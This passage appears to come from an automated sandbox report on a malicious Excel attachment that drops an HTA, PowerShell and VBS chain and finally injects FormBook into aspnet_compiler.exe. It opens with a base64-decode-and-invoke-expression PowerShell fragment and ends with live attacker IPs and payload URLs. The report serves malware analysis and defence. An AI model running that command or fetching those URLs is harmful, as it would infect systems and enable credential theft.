uzscsicckzgfkyw5ljywnjgrhzgfuzscsjyrkywrhbmunlcckzgfkyw5ljywnjgrhzgfuzscsjyrkywrhbmunlccxjywnjgrhzgfuzscpkts=';$morfose = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($alastrar));invoke-expression $morfose Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1566416 Sample: PI-02911202409#.xla.xlsx Startdate: 02/12/2024 Architecture: WINDOWS Score: 100 65 Suricata IDS alerts for network traffic 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 Multi AV Scanner detection for submitted file 2->69 71 14 other signatures 2->71 11 EXCEL.EXE 31 26 2->11         started        process3 dnsIp4 57 172.245.123.12, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 11->57 59 linkjago.me 188.114.97.6, 443, 49163, 49165 CLOUDFLARENETUS European Union 11->59 45 C:\Users\user\...\~$PI-02911202409#.xla.xlsx, data 11->45 dropped 47 C:\Users\...\seemebestgoodluckthings[1].hta, HTML 11->47 dropped 93 Microsoft Office drops suspicious files 11->93 16 mshta.exe 10 11->16         started        file5 signatures6 process7 dnsIp8 51 linkjago.me 16->51 61 Suspicious command line found 16->61 63 PowerShell case anomaly found 16->63 20 cmd.exe 16->20         started        signatures9 process10 signatures11 77 Suspicious powershell command line found 20->77 79 Wscript starts Powershell (via cmd or directly) 20->79 81 PowerShell case anomaly found 20->81 23 powershell.exe 24 20->23         started        process12 file13 41 C:\...\seemebestthingsentirelifegivenbac.vbS, Unicode 23->41 dropped 43 C:\Users\user\AppData\...\akgiliwf.cmdline, Unicode 23->43 dropped 83 Installs new ROOT certificates 23->83 27 wscript.exe 1 23->27         started        30 csc.exe 2 23->30         started        signatures14 process15 file16 85 Suspicious powershell command line found 27->85 87 Wscript starts Powershell (via cmd or directly) 27->87 89 Windows Scripting host queries suspicious COM object (likely to drop second stage) 27->89 91 Suspicious execution chain found 27->91 33 powershell.exe 12 4 27->33         started        49 C:\Users\user\AppData\Local\...\akgiliwf.dll, PE32 30->49 dropped 37 cvtres.exe 30->37         started        signatures17 process18 dnsIp19 53 ip.1016.filemail.com 142.215.209.77, 443, 49168 HUMBER-COLLEGECA Canada 33->53 55 1016.filemail.com 33->55 73 Writes to foreign memory regions 33->73 75 Injects a PE file into a foreign processes 33->75 39 aspnet_compiler.exe 33->39         started        signatures20 process21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.215.209.77
 ip.1016.filemail.com Canada
32156 HUMBER-COLLEGECA true
188.114.97.6
 linkjago.me European Union
13335 CLOUDFLARENETUS false
172.245.123.12
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted Domains

Name IP Active
linkjago.me 188.114.97.6 true
ip.1016.filemail.com 142.215.209.77 true
1016.filemail.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://172.245.123.12/361/TELNERA.txt true
  • Avira URL Cloud: safe
 unknown
https://linkjago.me/fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoat false
  • Avira URL Cloud: safe
 unknown
http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIF true
  • Avira URL Cloud: safe
 unknown
http://172.245.123.12/361/sen/seemebestgoodluckthings.hta true
  • Avira URL Cloud: safe
 unknown
https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c true
  • Avira URL Cloud: safe
 unknown